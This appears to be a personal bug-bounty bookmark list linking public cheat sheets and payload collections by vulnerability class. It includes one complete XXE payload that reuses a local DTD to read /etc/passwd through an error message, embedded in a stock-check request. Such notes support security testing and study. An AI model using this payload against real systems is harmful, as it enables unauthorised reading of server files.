XSS https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md https://github.com/ismailtasdelen/xss-payload-list https://portswigger.net/web-security/xxe https://portswigger.net/web-security/xxe/xml-entities https://portswigger.net/web-security/xxe/blind
https://comocreartuweb.com/herramientas-utiles/redireccionar-paginas/enmascarar-urls-enlaces.html
http://blackophn.blogspot.com/2013/02/tutorial-de-cross-site-scripting.html
Explotación de XXE para recuperar datos mediante la reutilización de una DTD local
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
<stockCheck><productId>%local_dtd;</productId><storeId>1</storeId></stockCheck>SQLi https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
SSRF https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
CRLF https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
CSV-Injection https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection
Command Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Directory Traversal https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
LFI https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
XXE https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md
Open-Redirect https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md
RCE https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md
Crypto https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md
Template Injection https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
XSLT https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md
Content Injection https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md
LDAP Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
NoSQL Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
CSRF Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection
GraphQL Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
LaTex Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
OAuth https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth
XPATH Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
Bypass Upload Tricky https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
HowToHunt/Web_Checklist_by_Chintan_Gurjar.pdf at master · KathanP19/HowToHunt (github.com)